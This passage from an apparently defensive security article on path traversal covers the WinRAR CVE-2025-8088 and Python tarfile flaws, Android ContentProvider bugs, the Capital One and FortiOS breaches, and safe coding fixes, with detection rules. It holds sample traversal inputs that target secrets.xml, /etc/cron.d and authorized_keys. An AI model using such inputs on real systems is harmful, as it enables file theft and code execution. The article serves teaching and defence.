- Outbound C2 connections to known RomCom infrastructure
- IPs: [REDACTED - check threat intelligence feeds]

Defense & Mitigation:

1. Immediate Actions (Priority 1):

# Check the WinRAR version (PowerShell)
(Get-Item "C:\Program Files\WinRAR\WinRAR.exe").VersionInfo.ProductVersion

# If < 7.13 → update immediately:
# Download from: https://www.win-rar.com/download.html

2. Detect Existing Compromise:

# PowerShell: scan Startup folders for unexpected files
Get-ChildItem -Path "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup" -Force |
  Where-Object { $_.LastWriteTime -gt (Get-Date).AddDays(-30) } |
  Select-Object Name, LastWriteTime, Length

# List alternate data streams attached to files under the current folder
# (streams packed inside an archive only become visible after extraction)
Get-ChildItem -Recurse -File | ForEach-Object {
    Get-Item $_.FullName -Stream * | Where-Object Stream -ne ':$DATA'
}

3. Endpoint Protection:

Windows Defender: keep signatures up to date (detection names for this exploit vary by vendor)
EDR rules: alert on .exe creation in Startup folders not initiated by MSI/setup
Application allowlisting: only allow signed executables to run from Startup

4. Email Security:

YARA rule:
rule WinRAR_CVE_2025_8088_ADS {
    meta:
        description = "Detect RAR with suspicious ADS patterns"
        author = "SOC Team"
        date = "2025-08"
    strings:
        $ads1 = "..\\..\\.." ascii wide
        $ads2 = "Startup" ascii wide nocase
        $ads3 = ":$DATA" ascii wide
    condition:
        uint32(0) == 0x21726152 and  // RAR signature
        2 of ($ads*)
}

5. User Awareness:

Do not open RAR/ZIP files from emails of unknown origin
Check the sender carefully (RomCom spoofs HR emails)
Use an online sandbox such as VirusTotal or Any.Run before extracting
Enable "Show hidden files" and "Show file extensions" in Windows Explorer

Why This Matters for Your Organization:

If you think "we don't use WinRAR", that is a serious mistake:

End users install it themselves: 350 million downloads, and many employees install a personal copy
Legacy systems: many old servers and workstations still have WinRAR pre-installed
Supply chain: partners and vendors send RAR files → IT staff extract them with WinRAR
BYOD: personal devices access the corporate network

RomCom does not pick random targets; they research carefully:

LinkedIn reconnaissance → they learn which technologies a company uses
Highly convincing spear-phishing emails
Timed attacks: the "resume" arrives while the company is hiring (they check job posts)

Cost of compromise:

Incident response: $50,000–$200,000 (forensics, remediation)
Ransomware (if escalated): about $4.5M on average (figure cited from IBM's Cost of a Data Breach Report)
IP theft: immeasurable for defense/manufacturing
Compliance fines: under GDPR, up to €20M or 4% of global annual revenue, whichever is higher

3. Mobile & Backend: ContentProvider, os.path.join(), and 350,000 Projects Crying Quietly

Android ContentProvider – 90%+ of apps affected (Oversecured research):

The openFile() method lacks validation → the attacker sends content://com.victim.provider/..%2F..%2Fshared_prefs%2Fsecrets.xml, which Android decodes to ../../shared_prefs/secrets.xml
This gives access to databases, SharedPreferences (holding tokens/API keys), and cached files under /data/data/com.victim/
Dirty Stream attack (Microsoft, 2024): a FileProvider with a malicious _display_name → writes a file to ../../lib/malicious.so → the library is loaded → RCE
Google Play has auto-scanned for this since 16 January 2018 and blocks vulnerable apps, but some still slip through

Python os.path.join() – a deadly trap:

os.path.join('/var/www/files/', '/etc/passwd')
# → Returns: '/etc/passwd' (the base is swallowed!)

If the user input is an absolute path, every component before it disappears. Fix: resolve the joined path with pathlib and verify it is still inside the base:

from pathlib import Path

def resolve_inside(base_dir, user_input):
    base = Path(base_dir).resolve()
    requested = (base / user_input).resolve()
    if not requested.is_relative_to(base):  # Python 3.9+
        raise ValueError("path escapes the base directory")
    return requested  # OK, within bounds

CVE-2007-4559 (tarfile) – an 18-year drama:

A vulnerability in tar.extractall() dating from 2007, CVSS 9.8
Affects 350,000+ open-source projects
For years the Python team declined to change it, calling it "working as designed"
A malicious .tar contains ../../etc/cron.d/evil → extracted outside the target → a cron job runs the attacker's code
Extraction filters arrived with PEP 706: tar.extractall(filter='data'), available from Python 3.12 (and backported to security releases of older versions), becoming the default only in Python 3.14

In plain terms: you tell Python to unpack an archive into /tmp/safe/, but a file inside the archive is named ../../../root/.ssh/authorized_keys. Python obediently unpacks it under exactly that name, and the attacker now has an SSH key on the server.
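
A safer extraction routine can combine a manual containment check with the PEP 706 filter where the running interpreter provides it. This is a sketch under assumptions: safe_extract and build_demo_tar are illustrative helpers, link members are rejected outright for simplicity, and the demo archives are built in memory.

```python
import io
import os
import tarfile
import tempfile


def safe_extract(tar: tarfile.TarFile, dest: str) -> None:
    """Extract only if every member resolves inside dest and is not a link."""
    dest_real = os.path.realpath(dest)
    for member in tar.getmembers():
        target = os.path.realpath(os.path.join(dest_real, member.name))
        if os.path.commonpath([dest_real, target]) != dest_real:
            raise ValueError(f"blocked member outside destination: {member.name}")
        if member.issym() or member.islnk():
            raise ValueError(f"blocked link member: {member.name}")
    if hasattr(tarfile, "data_filter"):
        tar.extractall(dest_real, filter="data")  # PEP 706 filter, where available
    else:
        tar.extractall(dest_real)


def build_demo_tar(member_name: str) -> bytes:
    """Build a one-file tar archive in memory for demonstration."""
    buffer = io.BytesIO()
    with tarfile.open(fileobj=buffer, mode="w") as tar:
        data = b"demo"
        info = tarfile.TarInfo(name=member_name)
        info.size = len(data)
        tar.addfile(info, io.BytesIO(data))
    return buffer.getvalue()


with tempfile.TemporaryDirectory() as dest:
    with tarfile.open(fileobj=io.BytesIO(build_demo_tar("ok.txt"))) as tar:
        safe_extract(tar, dest)
    extracted_ok = os.path.exists(os.path.join(dest, "ok.txt"))
    try:
        with tarfile.open(fileobj=io.BytesIO(build_demo_tar("../evil.txt"))) as tar:
            safe_extract(tar, dest)
        blocked = False
    except ValueError:
        blocked = True

print(extracted_ok, blocked)
```

Checking every member before extracting anything means a single hostile entry leaves the destination untouched, instead of half-populated.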

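CVE-2007-4559 was born the year I was in primary school. I now work as a security engineer, and extractall() is still unsafe on most deployed Python versions unless you explicitly ask for a filter. Perhaps the Python team was waiting for me to retire.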

4. Real Breaches: $100 Million, 106 Million People, and a 6-Year Nightmare

Capital One (2019):

106 million records stolen (100M US, 6M Canada): 140k SSNs, 80k bank account numbers, 1M SINs
SSRF through a misconfigured WAF, combined with traversal-style requests to the cloud metadata endpoint, yielded credentials that opened the S3 buckets
Damage: the stock dropped 5.9% immediately and lost 15% within 2 weeks; handling costs of $80–100 million; class action lawsuits; 2 years of credit monitoring for 106M people
Root causes: misconfigured WAF, over-privileged IAM role, weak monitoring → the attacker lingered for months unnoticed

Fortinet FortiOS CVE-2018-13379 – a nightmare still running after 6 years:

Path traversal in the SSL VPN, reading the sslvpn_websession file that holds plaintext usernames and passwords
Patched in May 2019, presented at Black Hat in August 2019
2021: 14,528 endpoints still vulnerable, credentials sold on the dark web for $100–10,000 each
EPSS score 97% (top 3% most likely to be exploited)
Used as initial access for Cring ransomware (January 2021) and by APT groups; CISA alerts AA20-283A & AA20-296A
64% of VPN vulnerabilities lead to ransomware campaigns

Bug bounty – path traversal still pays well:

Opera Cashback (XSS chain via path traversal): $8,000
Reverb (DOM XSS via double encoding): $5,000
NFT platform (Next.js router misconfig): $4,000
HackerOne reports: $888–$12,000 (Apache, GitLab, Vanilla Forums, U.S. DoD)

THREE SECURITY LESSONS TO APPLY RIGHT AWAY

Lesson 1: Use Indirect References – Never Trust User Input for a File Path

Instead of:

filename = request.args.get('file')
return send_file(f"/var/www/uploads/{filename}")

Use:

FILE_MAP = {
    '1': 'report_jan.pdf',
    '2': 'report_feb.pdf'
}
file_id = request.args.get('id')
if file_id in FILE_MAP:
    return send_file(f"/var/www/uploads/{FILE_MAP[file_id]}")

The user only ever sees an ID and never touches the real path.

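Lesson 2: Python pathlib – The Standard Way to Move Off os.path.join()

from pathlib import Path
from flask import abort, request, send_file

BASE_DIR = Path('/var/www/uploads').resolve()  # Normalize the base once

def download():
    user_input = request.args.get('filename', '')
    requested = (BASE_DIR / user_input).resolve()  # resolve() collapses ../ and follows symlinks

    # CRITICAL check (Python 3.9+):
    if not requested.is_relative_to(BASE_DIR):
        abort(400, "Path traversal detected")

    # On Python 3.8 and earlier, compare path components instead of string prefixes:
    # if BASE_DIR != requested and BASE_DIR not in requested.parents:
    #     abort(400)

    return send_file(requested)

Why it is safe:

.resolve() normalizes the path, removes ../, and expands symlinks
is_relative_to() guarantees the file is inside the base
An absolute user_input still replaces the base when joined (pathlib behaves like os.path.join() here), but the containment check then rejects the result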
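
Why a component-wise comparison matters can be shown with a sibling directory whose name merely starts with the base path. This is a small sketch on already-resolved path strings; inside_by_prefix and inside_by_parts are hypothetical helper names, and PurePosixPath is used so the example behaves the same on any platform.

```python
from pathlib import PurePosixPath

BASE = PurePosixPath("/var/www/uploads")


def inside_by_prefix(candidate: str) -> bool:
    """String-prefix check: also accepts siblings such as /var/www/uploads_private."""
    return candidate.startswith(str(BASE))


def inside_by_parts(candidate: str) -> bool:
    """Component-wise check: BASE itself or a true descendant of it."""
    path = PurePosixPath(candidate)
    return path == BASE or BASE in path.parents


sibling = "/var/www/uploads_private/key.pem"
print(inside_by_prefix(sibling))  # the prefix check is fooled
print(inside_by_parts(sibling))   # the component check is not
print(inside_by_parts("/var/www/uploads/report_jan.pdf"))
```

The component-wise form also works on Python versions that predate is_relative_to(), since parents has been part of pathlib from the start.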

Lesson 3: Framework Primitives – Don't Rebuild What Already Exists

Flask:

from flask import send_from_directory
return send_from_directory('/var/www/uploads', filename)
# ✅ Validates automatically and blocks traversal

FastAPI:

from fastapi.staticfiles import StaticFiles
app.mount("/static", StaticFiles(directory="static"), name="static")
# ✅ Built-in protection

Django:

from django.http import FileResponse
return FileResponse(open(safe_path, 'rb'))
# ✅ Use only with a path that has already been validated

Werkzeug (Flask dependency):

from werkzeug.utils import secure_filename
filename = secure_filename(user_input)
# ../../etc/passwd → etc_passwd

"TAKE HOME AND APPLY NOW" CHECKLIST

[ ] Audit code: grep the whole codebase for open(, os.path.join(, send_file(, tar.extractall(, FileProvider, ContentProvider.openFile(). Mark every place where user input touches a path.
[ ] Add SAST to CI/CD: Bandit (Python), Semgrep (multi-language); block the merge when an unsafe file operation is detected.
[ ] Enable WAF rules: ModSecurity CRS 930100–930130 (path traversal), or the AWS WAF/Cloudflare managed rulesets.
[ ] Framework updates: patch new CVEs promptly (Spring, Django, Flask, Node.js) and check security advisories weekly.
[ ] Principle of least privilege: run the app as www-data, not root; chmod 640 for sensitive files, 750 for the upload dir.
[ ] Container/SELinux/AppArmor: restrict filesystem access so the app can read only /var/www/ and is denied /etc/, /root/, /home/.
[ ] Logging & monitoring: log every validation failure with user ID and attempted path → detect attack patterns → alert the SOC.
[ ] Mobile: make sure each ContentProvider has android:exported="false" unless export is truly needed; FileProvider should use <files-path path="subdir/"> rather than path=".".
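
For the logging and monitoring item, a first-pass detector over request targets can be prototyped as follows. It is a rough sketch with assumptions stated up front: looks_like_traversal is a hypothetical helper, it decodes a fixed three rounds, and it only recognizes dot-dot-separator sequences and NUL bytes, so overlong UTF-8 and other exotic encodings need their own rules.

```python
import re
from urllib.parse import unquote

# A '..' followed by either separator, or a raw NUL byte
TRAVERSAL = re.compile(r"(\.\.[/\\])|(\x00)")


def looks_like_traversal(request_target: str) -> bool:
    """Decode a few rounds, then look for traversal markers in the result."""
    decoded = request_target
    for _ in range(3):
        decoded = unquote(decoded)
    return bool(TRAVERSAL.search(decoded))


samples = [
    "/download?file=%252e%252e%252fetc%252fpasswd",
    "/download.php?file=a%00.pdf",
    "/api/files?name=report.pdf",
]
for target in samples:
    print(target, looks_like_traversal(target))
```

A detector like this belongs in alerting, not in the request path: blocking decisions should rest on the containment check, while log matches tell the SOC that someone is probing.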

CLOSING: THE TWO CHARACTERS "../" AND A LESSON ABOUT UNDERESTIMATION

Path traversal has existed for 20+ years, grew 85% over the last two years, and has caused hundreds of millions of USD in damage and exposed the data of 106 million people, yet some colleagues still call it a "basic bug". The truth is that there are no "basic" bugs, only serious consequences that get underestimated.

This week, run a Bandit scan, enable WAF rule 930100, and refactor that suspicious os.path.join() code. Review the ContentProviders in your Android app. Check whether the server runs with root privileges. Because every night some ransomware gang is scanning for FortiOS VPNs, because CISA still had to issue an alert for WinRAR in 2025, and because Capital One has still not finished paying compensation.

And remember: every time you see ../ in a log, thank your monitoring system, because without it that line could be running in /etc/cron.d/ right now.

One last dark joke: if path traversal is a "basic bug", why is there a new CVE every year? Maybe our definition of "basic" needs to... traverse back to the start.

REFERENCES

MITRE CWE-22: Improper Limitation of a Pathname to a Restricted Directory
OWASP Path Traversal (2024 update)
CVE-2023-50164 (Apache Struts), CVE-2024-38816 (Spring Framework), CVE-2025-8088 (WinRAR), CVE-2007-4559 (Python tarfile)
CISA Known Exploited Vulnerabilities Catalog
Oversecured Mobile Security Research (Android ContentProvider analysis)
Python PEP 706: Filter for tarfile.extractall
OWASP ModSecurity Core Rule Set v4.x
